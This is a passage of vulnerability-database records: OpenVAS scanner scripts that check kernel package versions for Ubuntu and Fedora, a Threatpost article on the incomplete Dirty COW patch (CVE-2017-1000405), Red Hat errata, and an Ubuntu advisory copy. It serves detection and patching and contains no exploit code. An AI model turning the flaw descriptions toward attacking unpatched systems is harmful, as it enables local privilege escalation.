ver:\"4.4.0-1013.18\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-generic\", ver:\"4.4.0-104.127\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-generic-lpae\", ver:\"4.4.0-104.127\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-lowlatency\", ver:\"4.4.0-104.127\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-powerpc-e500mc\", ver:\"4.4.0-104.127\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-powerpc-smp\", ver:\"4.4.0-104.127\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-powerpc64-emb\", ver:\"4.4.0-104.127\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-powerpc64-smp\", ver:\"4.4.0-104.127\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1044-aws\", ver:\"4.4.0-1044.53\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1080-raspi2\", ver:\"4.4.0-1080.88\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-aws\", ver:\"4.4.0.1044.46\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"4.4.0.104.109\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n 
exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"4.4.0.104.109\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-kvm\", ver:\"4.4.0.1013.13\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"4.4.0.104.109\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc\", ver:\"4.4.0.104.109\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp\", ver:\"4.4.0.104.109\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb\", ver:\"4.4.0.104.109\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp\", ver:\"4.4.0.104.109\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-raspi2\", ver:\"4.4.0.1080.80\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-12193", "CVE-2017-16939", "CVE-2017-16643", "CVE-2017-1000405"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-12-09T00:00:00", "id": "OPENVAS:1361412562310843400", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843400", "type": "openvas", "title": "Ubuntu Update for linux-aws USN-3509-2", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3509_2.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux-aws USN-3509-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843400\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-09 07:39:26 +0100 (Sat, 09 Dec 2017)\");\n script_cve_id(\"CVE-2017-16939\", \"CVE-2017-1000405\", \"CVE-2017-12193\", \"CVE-2017-16643\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-aws USN-3509-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-aws'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present 
on the target host.\");\n script_tag(name:\"insight\", value:\"USN-3509-1 fixed vulnerabilities in the\n Linux kernel for Ubuntu 16.04 LTS. This update provides the corresponding\n updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for\n Ubuntu 14.04 LTS. Mohamed Ghannam discovered that a use-after-free vulnerability\n existed in the Netlink subsystem (XFRM) in the Linux kernel. A local attacker\n could use this to cause a denial of service (system crash) or possibly execute\n arbitrary code. (CVE-2017-16939) It was discovered that the Linux kernel did not\n properly handle copy-on- write of transparent huge pages. A local attacker could\n use this to cause a denial of service (application crashes) or possibly gain\n administrative privileges. (CVE-2017-1000405) Fan Wu, Haoran Qiu, and Shixiong\n Zhao discovered that the associative array implementation in the Linux kernel\n sometimes did not properly handle adding a new entry. A local attacker could use\n this to cause a denial of service (system crash). (CVE-2017-12193) Andrey\n Konovalov discovered an out-of-bounds read in the GTCO digitizer USB driver for\n the Linux kernel. 
A physically proximate attacker could use this to cause a\n denial of service (system crash) or possibly execute arbitrary code.\n (CVE-2017-16643)\");\n script_tag(name:\"affected\", value:\"linux-aws on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3509-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3509-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1005-aws\", ver:\"4.4.0-1005.5\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-generic\", ver:\"4.4.0-103.126~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-generic-lpae\", ver:\"4.4.0-103.126~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-lowlatency\", ver:\"4.4.0-103.126~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-powerpc-e500mc\", ver:\"4.4.0-103.126~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-powerpc-smp\", 
ver:\"4.4.0-103.126~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-powerpc64-emb\", ver:\"4.4.0-103.126~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-powerpc64-smp\", ver:\"4.4.0-103.126~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-aws\", ver:\"4.4.0.1005.5\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae-lts-xenial\", ver:\"4.4.0.103.86\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lts-xenial\", ver:\"4.4.0.103.86\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency-lts-xenial\", ver:\"4.4.0.103.86\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc-lts-xenial\", ver:\"4.4.0.103.86\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp-lts-xenial\", ver:\"4.4.0.103.86\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb-lts-xenial\", ver:\"4.4.0.103.86\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp-lts-xenial\", ver:\"4.4.0.103.86\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, 
{"lastseen": "2019-05-29T18:34:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000405"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-12-05T00:00:00", "id": "OPENVAS:1361412562310873860", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873860", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2017-b0c1f44130", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_b0c1f44130_kernel_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for kernel FEDORA-2017-b0c1f44130\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873860\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-05 07:55:57 +0100 (Tue, 05 Dec 2017)\");\n script_cve_id(\"CVE-2017-1000405\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2017-b0c1f44130\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-b0c1f44130\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X6LLKSHB3TZCA72UK4KDILWHY4Q4RTGU\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.13.16~302.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000405"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-12-05T00:00:00", "id": "OPENVAS:1361412562310873857", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873857", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2017-9ea11e444d", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_9ea11e444d_kernel_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for kernel FEDORA-2017-9ea11e444d\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873857\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-05 07:54:59 +0100 (Tue, 05 Dec 2017)\");\n script_cve_id(\"CVE-2017-1000405\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2017-9ea11e444d\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-9ea11e444d\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2ALUMLCIZOR6UUC5NJKXPGIAXHBJR6NL\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.13.16~202.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2019-01-23T05:28:03", "bulletinFamily": "info", "cvelist": ["CVE-2016-5195", "CVE-2017-1000405"], "description": "A flaw in the original patch for the notorious Dirty COW vulnerability could allow an adversary to run local code on affected systems and exploit a race condition to perform a privilege escalation attack.\n\nThe flaw in the Dirty COW patch (CVE-2016-5195), [released in October 2016](<https://threatpost.com/serious-dirty-cow-linux-vulnerability-under-attack/121448/>), was identified by researchers at the security firm Bindecy. On Wednesday, [they released details](<http://www.openwall.com/lists/oss-security/2017/11/30/1>) of the vulnerability ([CVE-2017-1000405](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000405>)) found in the original Dirty COW patch, affecting several Linux distributions.\n\nThe scope of affected products is significantly smaller than the original Dirty COW bug, which impacted many more Linux distributions and the Android operating system.\n\n\u201cIn terms of scope, the difference is just that the current bug is not [applicable to Android](<https://threatpost.com/google-releases-supplemental-patch-for-dirty-cow-vulnerability/121843/>) and Red Hat Enterprise Linux. All other distributions \u2013 Ubuntu, Fedora, SUSE \u2013 suffer from the issue. So, the scope is still large. 
We estimate that millions of machines are vulnerable,\u201d said Daniel Shapiro, researcher at Bindecy, credited for finding the flaw along with colleague Eylon Ben Yaakov.\n\nThe vulnerability, CVE-2017-1000405, is rated \u201cImportant\u201d and scores 6.1 on the CVSS scale.\n\nRed Hat Software notified customers of the flawed patch on Thursday noting the issue does not affect the Linux kernel packages as shipped with Red Hat Enterprise Linux 5, 6, 7 and Red Hat Enterprise MRG 2, according to Red Hat\u2019s [customer portal](<https://access.redhat.com/security/cve/CVE-2017-1000405>).\n\nDirty COW was patched in October 2016 after it was discovered in public exploits. The vulnerability was found in the copy-on-write (COW) feature in Linux and could be used by an attacker with local access to obtain root privileges on a Linux or Android device.\n\nThe flaw, which was introduced in 2007 in version 2.6.22 of the kernel, allows an attacker to elevate privileges by taking advantage of a race condition and gain write-access to read-only memory.\n\nThe flaw allows an attacker with a local system account to modify on-disk binaries, bypassing the standard permission mechanisms that would prevent modification without an appropriate permission set.\n\nCopy-on-write manages memory resources and allows for more than one process to share a page until a user writes to it, known in programming as marking a page dirty. 
The vulnerability allows an attacker to exploit the race condition to write to the original page before it\u2019s marked dirty.\n\nThe October 2016 patch addressed the Dirty COW vulnerability for both regular pages and transparent huge pages (supported since kernel approximately 2.6.38), according to Shapiro.\n\n\u201cThere is a code flow that wasn\u2019t taken into account that breaks the logic of the patch for transparent huge pages,\u201d he said.\n\n\u201cIn the original vulnerability the exploit targeted pages backed by read-only files, with the new bug we could write to a read-only special huge-page called \u2018zero page\u2019. It is assumed to be initialized with zeroes and some software rely on that assumption (including privileged processes),\u201d Shapiro said.\n\nA more detailed description of the flaw can be found in a technical write-up by Yaakov [here](<https://medium.com/bindecy/huge-dirty-cow-cve-2017-1000405-110eca132de0>).\n\nAccording to the disclosure timeline, researchers reported the vulnerability to the Linux Kernel Organization on Nov. 22. A CVE was assigned the same day and a patch was committed to the mainline kernel Nov. 27. The vulnerability was officially made public on Friday.\n\nImmediate mitigation includes disabling the use of \u201czero page\u201d.\n\n\u201cIt is possible to prevent the zero page from being mapped as a huge page, by modifying a configuration tunable in the /sys directory\u2026 This prevents the flaw from being exercised in this method. 
# echo 0 > /sys/kernel/mm/transparent_hugepage/use_zero_page Disabling huge pages: It is possible to mitigate this flaw by disabling hugepages on a system,\u201d according to a [description of mitigations steps](<https://access.redhat.com/security/cve/CVE-2017-1000405>).\n\n\u201cThe real deal here is the astonishing fact that such a hyped vulnerability was patched incompletely,\u201d Shapiro said.\n", "modified": "2017-12-01T11:43:06", "published": "2017-12-01T11:43:06", "id": "THREATPOST:A28CC7C8B76DAF5EBFF24CE8575A2087", "href": "https://threatpost.com/flaw-found-in-dirty-cow-patch/129064/", "type": "threatpost", "title": "Flaw Found In Dirty COW Patch", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2019-08-13T18:44:47", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195", "CVE-2017-1000405"], "description": "The kernel-alt packages provide the Linux kernel version 4.x.\n\nSecurity Fix(es):\n\n* A flaw was found in the patches used to fix the 'dirtycow' vulnerability (CVE-2016-5195). An attacker, able to run local code, can exploit a race condition in transparent huge pages to modify usually read-only huge pages. (CVE-2017-1000405)\n\nRed Hat would like to thank Eylon Ben Yaakov and Daniel Shapiro for reporting this issue.\n\nBug Fix(es):\n\n* Previously, Red Hat Enterprise Linux 7.4 with the kernel version provided by the kernel-alt package, did not support turning off transactional memory (TM) on the POWER9 systems. With this update it is now possible to turn off TM on the POWER9 systems. (BZ#1509974)\n\n* Due to a bug in the ixgbe and i40e drivers, the socket buffer list (skb list) in some cases got corrupted when running Red Hat Enterprise Linux 7.4 with the kernel version provided by the kernel-alt package on the POWER9 systems. Consequently, a kernel panic occurred. This update fixes ixgbe and i40e, and the kernel no longer panics due to this behavior. 
(BZ#1518412)\n\n* Users can lower the max_sectors_kb setting in the sysfs file system to accommodate certain workloads. Previously, users needed to set the maximum I/O size to either the block layer default or the optional preferred I/O size reported by the device. This update fixes the scsi driver to keep the current heuristic function for the initial setting of max_sectors_kb. As a result, for subsequent invocations, the driver now only updates the current queue limit if it exceeds the capabilities of the hardware. (BZ#1518432)\n\n* When performing full-bootme tests on Boston ESS systems running Red Hat Enterprise Linux 7.4 with the kernel version provided in the kernel-alt package, a kernel panic occurred and the operating system dropped into the XMON software. This update fixes the Multi-Queue Block IO Queueing Mechanism (blk-mq), and the kernel no longer panics in these circumstances. (BZ#1518433)\n\n* When running the stress test on the file system with the gssstress command, and pulling one disk from one recovery group, \"kernel I/O error\" was reported, and gssstress became unresponsive. Gssstress now works as expected under the described circumstances. (BZ#1522645)\n\n* When using the fwupdate_xl710 utility to apply updates for NVM Intel Ethernet Converged Network Adapter XL710 on machines running Red Hat Enterprise Linux 7.4 with the kernel version provided in the kernel-alt package, a deadlock sometimes occurred when the i40e driver was acquiring access to the Non-Volatile Memory (NVM) of the device. Consequently, NVM acquire timeouts occurred, the firmware update failed with the following error message: \"Failed Acquiring NVM resource for read err=-53 status=0xa\", and left the device's memory in a corrupted state. This update fixes the i40e driver, and the firmware updates no longer fail due to this behavior. 
(BZ#1522843)\n\n* Previously, on POWER9 systems with more than 100 Pstates, the cpufreq driver did not handle the cases when the NxN matrix denominated transition table (trans_table) overflowed beyond the PAGE_SIZE boundary correctly. Consequently, reading trans_table for any of the CPUs failed with the following error:\n\n\"fill_read_buffer: show+0x0/0xa0 returned bad count\"\n\nWith this update reading trans_table for any of the CPUs now proceeds as expected under the described circumstances. (BZ#1522844)\n\n* Previously, the /sys/firmware/opal/exports directory did not contain an export node. Consequently, a range of memory in the Open Power Abstraction Layer (OPAL) that the operating system attempted to export to user space for debugging purposes was not available. With this update the sysfs file under /sys/firmware/opal/exports is now available for each property found there, and this file can be used for debugging purposes. (BZ#1522845)", "modified": "2018-03-19T16:23:48", "published": "2018-01-25T15:47:54", "id": "RHSA-2018:0180", "href": "https://access.redhat.com/errata/RHSA-2018:0180", "type": "redhat", "title": "(RHSA-2018:0180) Important: kernel-alt security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:44:39", "bulletinFamily": "unix", "cvelist": ["CVE-2017-8824"], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es):\n\n* kernel: Use-after-free vulnerability in DCCP socket (CVE-2017-8824, Important)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nBug Fix(es):\n\n* Previously, there were cases where the ethtool kernel code called the vzalloc() function, which allocates virtually contiguous memory with zero fill, with a size of zero. 
Consequently, running the ethtool -d command to query hardware registers led to the following dmesg error:\n\n ethtool: vmalloc: allocation failure: 0 bytes, mode:0x24080c2(GFP_KERNEL|__GFP_HIGHMEM|__GFP_ZERO)\n\nWith this update, the kernel code has been fixed to avoid the invalid vzalloc call, and the dmesg error no longer occurs. (BZ#1530128)\n\n* Previously, if an NFSv4 mount operation encountered an NFS client structure that has not completed initialization, the trunking detection logic waited for the operation to complete. Consequently, if a concurrent NFSv4 mount operation added another item to the list of NFS client structures, this client was not able to begin initialization, because it was waiting on the mutex held by the other process, and a deadlock occurred. This update fixes NFS to wait until the NFS client structure initialization is completed before adding a new structure to the list. As a result, the deadlock no longer occurs, and the NFS client can now initialize as expected under the described circumstances. (BZ#1530134)\n\n* If the Extensible Firmware Interface (EFI) created a new set of page tables and mapped a segment of code at a low address, the operating system (OS) failed to boot. This update fixes the EFI code, and the OS now boots as expected under the described circumstances. (BZ#1535880)\n\n* The Return Trampoline (Retpoline) mechanism mitigates the branch target injection, also known as the Spectre variant 2 vulnerability. With this update, Retpoline has been implemented into the Red Hat Enterprise Linux kernel. (BZ#1539648)\n\n* This update adds a new line to the /proc/cpuinfo file to show all available facilities that are reported by the stfle instruction on IBM z systems. 
(BZ#1540088)", "modified": "2018-03-06T23:31:52", "published": "2018-03-06T23:25:35", "id": "RHSA-2018:0399", "href": "https://access.redhat.com/errata/RHSA-2018:0399", "type": "redhat", "title": "(RHSA-2018:0399) Important: kernel security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:32:45", "bulletinFamily": "software", "cvelist": ["CVE-2017-12193", "CVE-2017-16939", "CVE-2017-16643", "CVE-2017-1000405"], "description": "# \n\n# Severity\n\nUnspecified\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 14.04\n\n# Description\n\nUSN-3509-2 fixed vulnerabilities in the Linux Hardware Enablement kernel for Ubuntu 14.04 LTS. Unfortunately, it also introduced a regression that prevented the Ceph network filesystem from being used. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nOriginal advisory details:\n\nMohamed Ghannam discovered that a use-after-free vulnerability existed in the Netlink subsystem (XFRM) in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- write of transparent huge pages. A local attacker could use this to cause a denial of service (application crashes) or possibly gain administrative privileges. (CVE-2017-1000405)\n\nFan Wu, Haoran Qiu, and Shixiong Zhao discovered that the associative array implementation in the Linux kernel sometimes did not properly handle adding a new entry. A local attacker could use this to cause a denial of service 